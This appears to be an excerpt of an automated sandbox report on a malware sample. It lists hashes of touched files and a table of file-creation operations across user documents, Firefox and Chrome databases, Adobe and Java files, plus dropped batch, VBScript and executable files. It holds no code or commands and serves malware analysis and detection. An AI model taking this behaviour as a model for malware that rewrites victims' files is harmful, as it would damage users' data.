SHA1: 95aeffa5c2c1b9338d9bcdd83405014981d7d161 SHA256: 775677de29be7b44f81a92bd7c7c213140c5b6f58e975f662a340a5d677db106 SSDeep: 768:QKGRoeCCzp0eF5rmpc62BJaK5G7y853wSq4QYun32gDY5mKGRoeCCzpQ:QKJ+zppYpcNP5WyIwSwYu32gZKJ+zpQ |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png | 11.52 KB |
MD5:
761440d2bb15c9120c564059c58c58aa
SHA1: 6ee245a8a00aae640a8b6a97a0255d4a49a37bd0 SHA256: 0ce5c32d511107dd0f7b612c2dca0a317a40adb80cfde23462565efb435c7135 SSDeep: 192:mliJUpaD/A1Q5l1Meyoo3qqSuALwxS2GgPfHele2ixQRE0o1RiZGl5BZ3KbWB2UB:GiJUpgiUluoo3L6LwKwml5RJwTL22d |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\logging.properties | 3.78 KB |
MD5:
ff0915aa02ec312ac2038ada8e906a24
SHA1: 582694f272cc82edefe0f1106ed20ad54d8209fe SHA256: 5e2812161bd3bfba4252824da5e50a8239f188867620717c9a0d149124269d42 SSDeep: 96:jvFfHakN7qOHOohraZs1mww6PILMAw3pMoFfdUjt:j9/aPOHlraZmV9A+RdQt |
|
|
| C:\Program Files\Java\jre1.8.0_131\bin\pack200.exe | 17.45 KB |
MD5:
1bc4d71edb6539818edf56ffdd0fbe45
SHA1: 4af97422299863c3ea28c3523d728c65bf163dde SHA256: 6e0e241107cc8b6728263e84da6b797642f7b79df1759e98286365ad3d8421cb SSDeep: 384:LJ8mCTn5hF/1KNLyee9QnYPBe0v1RXtOZR0XYd:LJhCTB8B/ey+eE/X4R0o |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkNoDrop32x32.gif | 1.53 KB |
MD5:
1a5dd850f141ab7110e69bf9c2aafae0
SHA1: fee9aa64ce667174a8c0871ac7d21c380470a584 SHA256: c7eb5dda34b7039fcb437aa221d21d6e25c1e53c8c1b24157d5841e9b6d302a2 SSDeep: 24:hXaNFCrOYPa/nFOBrUzb8Tim3lgi3A1ZC4pv40+FRMDFvRpb4rTXYs8jRQ53EFuh:0qVPaPFOUzAw+4pAvoFrbwTOjD9U |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\ph4FbxSYkvNgOdef0l1h\YbGEyCT2JqJcmmxzDKl2.jpg | 5.15 KB |
MD5:
920e28ae6ce1ba099299ce8dcb8ebe8d
SHA1: 085426390e6852e1cf663677b1accec05fcfb965 SHA256: 3d74a5152280e6112c27d51f99b72b37dce7dbbbac51799596a350e85d8368f0 SSDeep: 96:4jCVI79Sik228oaiKmBr1kEqiYE7eNwH8ybI94DnLMAw3pMoFfdU:4eqg18pdmeir7r89owA+Rd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api | 298.48 KB |
MD5:
cdfaae17e4b4cc3213eef1f66e59ee3e
SHA1: a3ce9a59afd3b14586bfdcc54d8836f3f9f4bfd5 SHA256: 9623a34ce3f9c445952d691ae6cd8f8e414586f02f1d6aec61f7e1ff04bee222 SSDeep: 6144:INmWvA4V+01bGVR2PST/ZwE8k+aQe8CX8k+aQsCRUkmC2KKeozv1BNA2h7xoxFpa:ITU0JKk6Zl8k+aQe868k+aQsCRUkmCdc |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\meta-index | 3.46 KB |
MD5:
7496bce0124688d718bffbf69eafcab3
SHA1: 061902f422435cac5ecf99153c30c2fcfd54ea96 SHA256: a84156b39465738f2fd6fc2b0d965e04cf4df76e70bf87de8071a6e535ec1f0c SSDeep: 96:F0cWD8/4WN/pBWg4KoZPLoxlGe7LMAw3pMoFfdU:DWQ/5mKoZTo/GbA+Rd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api | 1.27 MB |
MD5:
6388c1bf8215241fe41129a393dd3158
SHA1: 2bc6f973396abb84e8013694f93550c832e6c07a SHA256: 38411041a142f1fcf37c63c21b781137bc6b5a302374b72d89fab2a0963e0d75 SSDeep: 24576:IEywTjZOwNMzaypiXVTTMOzQtIb/EFKbxRdK2hDeO:I+7si/zQC/EFKbxRdzeO |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | 4.81 MB |
MD5:
68b87df50d639440d76b57246354c794
SHA1: 45c8a7c43705302afb760bf089e03362f85d5fa7 SHA256: 77f3e99ac31f20114fa9aefd4ef995ba6831380c32cc0fd5ff4d557e6b2b4979 SSDeep: 49152:rS7SdlNlKPUJrnw37H8eieZmpGkaBI3+Crduk2+xRapRY1UiQ76:2Om+Drw8RYRYax6 |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11-lic.gif | 9.00 KB |
MD5:
c680e1ba78ffe3a95061c8b07a4dcda9
SHA1: cec10f856ff26f822a1dc110d85450ac8a3f61a5 SHA256: 93d0f9a673bb87a61b6079e82f0ae74f8d745acdf295f93bfa2b2069a6845309 SSDeep: 192:zvJN1lrl5BsyFn3tbGoz4+r9p4HPf7xd286u8UnJ7yisX3U/w/jrnA+Rd:NNRsyFn9AO9p4HPf7xd/8Unc5Yurtd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp | 1.81 KB |
MD5:
aec23da93ce3826d74837b1e027ba6cd
SHA1: 38c7eff3161b51a43b6a7ee579a20043ff7da551 SHA256: a4dd5c97dbb10c42e8395cee152fdc82d8f2c2ec6e9197510c10530d825ab786 SSDeep: 48:yKZ2K/vJsvbIKPaPFOUzAw+4pAvoFrbwTOjD9U:yKT/vJKLMAw3pMoFfdU |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite | 225.38 KB |
MD5:
5da28e37498d5b27406d9059c1642c56
SHA1: ca1ec15374ac9318321ae2cb529fadc6bb54de82 SHA256: 3b2059fc2ab6e9aa67fc530c2a716aef6d479cfca51e31f515f959508ef6fdc4 SSDeep: 768:C7f+HUfSiMaBWu2S59m6v9IN5LL7U36wffxWTmjP1fiZJjbi77f+HUfSiMaBa:CT+HaiEl2yeLTafkAPdA3wT+HaiEa |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_lg.gif | 2.61 KB |
MD5:
321b5beea055806588e86768a3caa22d
SHA1: a98a21a444db8f77895a75ab7199ceb09832c828 SHA256: 1ca1af5049eb2c290daf078b63b7fb5faa9b9062ef768bfb2d98927dfb2d77be SSDeep: 48:Jm7WsuYUsh/CeJetHDEinCB1PaPFOUzAw+4pAvoFrbwTOjD9U:JzECACSLLMAw3pMoFfdU |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | 11.70 KB |
MD5:
338975f109754e937bc9e3643b41755d
SHA1: 4ed89a7f825078b29f60d3dbfb9cd81c696b01ca SHA256: 01bf4449523158334cf0cf00b2b5f26c65197a14fb80ba1677b3495d1dd73ebf SSDeep: 192:5bgHAiHXuS/ixBV43MedtCmy/cO/Ywca9nBiodUNxm6ynJRS9XR3JH1O8OMZvA+k:56+OixDnedo3R9B4yJRS9XnHW2Vd |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 86.04 KB |
MD5:
89b0435d587669dd1fb6fe7acad2cea6
SHA1: 18756749258bd123e7c418533b513f936d4fd752 SHA256: a229b7b23eddcf44cd261c09d043273703517023da2375eee49d125c60662907 SSDeep: 1536:YWpr8P7x7Cijnrimm8dbHVLokF8iJTwRH0IM2D57Kykf8d/R8Tyr5J5is7MoK:G9rrBm8PL3E7Qw/STyr5Jks7MoK |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster.jpg | 31.02 KB |
MD5:
d394c43021b74bd5dee79394fd4004bc
SHA1: 92fd232d5e6e441258cb38d96f88e8d5ee37cbc4 SHA256: 5b59012bdcd4db01e06cbfb4146c72a077e4a75330bd8f897bc46650a72288fb SSDeep: 768:Bk8fAaVdIsOl1uiiuZa+LZiVfkCNbJTn8VYAPKjcjl+g4q:e8fVVesOl1kcjZSlJTYUgf |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp | 1.78 KB |
MD5:
1eb793aac0dfbef3c76440a2e8fd313f
SHA1: 2d28d4fd2f2f7b05ae709a53d1593be663fcea38 SHA256: 1e004aa6e77cbbaa11b270c009194756f98248199fae5e9e05fb8b43be66b033 SSDeep: 48:Y/dn+/gXfWPaPFOUzAw+4pAvoFrbwTOjD9U:E1+ouLMAw3pMoFfdU |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png | 29.48 KB |
MD5:
062a1bbbea012528073740463b5336f1
SHA1: ab9ab4f793e6cf66f16a6603149bbbd0bd15ee57 SHA256: 59a0b513dc1cdb88c67d817cbc22b032773457f1d4055c33cc4c11e5a424b42e SSDeep: 768:0fzILdoOVz9TlGdcIrggu1QycR+emFkJ58lNhql4:0fz9OBZwVrTqQycMe7yhD |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterBold.ttf | 229.96 KB |
MD5:
e75bc4e7f0308c0aa1ee45700e65bd8f
SHA1: 1032363869f48ff6560b142c6bf09e893f579631 SHA256: 9800779c9238c9c66ae7425e43daf2b7b4ab8e7744243e7a7e9f3d9849be28cf SSDeep: 6144:03DRgF6nx5KIMtYwqcO3GbA4MJcs2ME9UGQ2n9gM/oKXxo:ERG6BMtgcGGPMJcs4b9gM/Jxo |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_es.properties | 4.90 KB |
MD5:
3a153a37eba0e7ecdbc49afb8c4c2c38
SHA1: c1078b035a4d93ed5c76f41be9593f3af9ba8d73 SHA256: 1051eb6783ce03576b1a9bf9987eaa59e8a338ce948cf72d91b2deb605bbef0f SSDeep: 96:uBzowgcV03FJyJFvybNl3TKu85m0qp/cWle0/+eSLMAw3pMoFfdUs:uGwgcV03byJ1Av3Cm0qp/5lOMA+RdL |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite | 1.00 MB |
MD5:
124220a5f9f53ed94bc0c2f3b6515da7
SHA1: c44c819a68cf015df78d4e7f88aa8bda53ba8c7f SHA256: 928361a1cb11a03429b51942687bf00e90f33f5794807c4ae99201eb867b73ad SSDeep: 12288:mbQoSZAKT/kNRt3QtG2xKN5c03bacxQmiXFZNMf8j:JoxS/c2x1GiX28 |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | 238.39 KB |
MD5:
45c9c72c9e1c3fee01a1a040d5cc599b
SHA1: 8566c7df64b23833c58ce8c3b276290e1c71cde7 SHA256: de55564a7c57f4b33ad7077b1b30db393490a417a24897dc6111c73c40aea9cc SSDeep: 6144:cq0tNyyoB46Ak+naqaucYEDpEX3gZYreD:cq0tNyF4xk+na0cbGwZPD |
|
|
| C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | 1.93 MB |
MD5:
14a531d038049a028e447d2f364679f4
SHA1: 5079e9659ac7c9d70fb172eec5ca1a5eeb3bc24a SHA256: 522b806a9731ad2cc55891b366b405b4b89343c8466d4facc9a629fce77388b6 SSDeep: 49152:vVvC05r0RzGM+74dGDL2bVy8v3yVkcmRHNsKtJzY:NvC05r00z7dmbVyaCVyRCKt |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | 20.72 KB |
MD5:
f2b9310408597d2fe2b3bd95cadfd8e1
SHA1: 01f09b811a706d86629cc4431b148e8c3339da9c SHA256: 8b2636556031ae686c574e78887904e6b118caed162813a580c9fd1dc5cbafa2 SSDeep: 384:rPKBwcJp3Qlllllllgkw4LKK6HIKpWExEZHTpKmppP3FobuUt5AEraCd:riBwcJlKus+EZzAIpP3iKUs7C |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 10.00 MB |
MD5:
5ab5e4b128259efdba1230bc452aea19
SHA1: 5ecf0bd1d00ea49a79dca98e265eec5f804c4dfc SHA256: 171e67529bf0114d61de5f16927219234fe406b0ab18b9a4c635c7d92c67befc SSDeep: 98304:uqNrvZZApqebmeB+m1oW5lVFwAuHTVk1hi:ZNrvQgMEH5Ghi |
|
|
| C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js | 4.87 KB |
MD5:
81a13fadd1c3d55ae029327932ed1488
SHA1: 6097bed8864dfebc08feb29beca29dc198991c76 SHA256: dadf8d5aef01a1d14cfe1ca5ee8342cf2dd589852296cb3f52c1cac592527e7a SSDeep: 96:2At2jNnO3C9vP376XSde4l752DeFixVZTvwYnhTUXkX+VLMAw3pMoFfdU:2AtKNnZ9Meey752DeFixzT/hT0+A+Rd |
|
|
Host Behavior
File (5746)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\ALL_dmp.fldp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\log.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\hdOYQpCI.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\zhUe98iP.bat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\9DndEMsj.vbs | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\index.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\4HLVFMJi0TEZis.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\mdL8k Va-5FKe6nPut.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\Database1.accdb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\webappsstore.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\content-prefs.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\paxvQz3-EP.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\iMSNcoQ2TST\ny90IkJZSE2u2wT.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\2A IhUpAi4OxfZpS31y.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\UD8BhjKoyfXri7m_sO.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\iMSNcoQ2TST\X7RlsIgbCQ w\MkRHHKT7IMT_fLj_.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Travelocity.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Document Cloud for Government.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\5lXN7JBDrzW7QzgW.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\2V_IO2AUQIPx.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\LO2jqGBBhn-U1Bqvt.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\GEdm3oWQna3YSF.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\iMSNcoQ2TST\X7RlsIgbCQ w\Fpxf VK--P7V0ohLac.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\keytool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\server\Xusage.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\classlist | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_es.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\sTBSoH3nhMOaZ.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
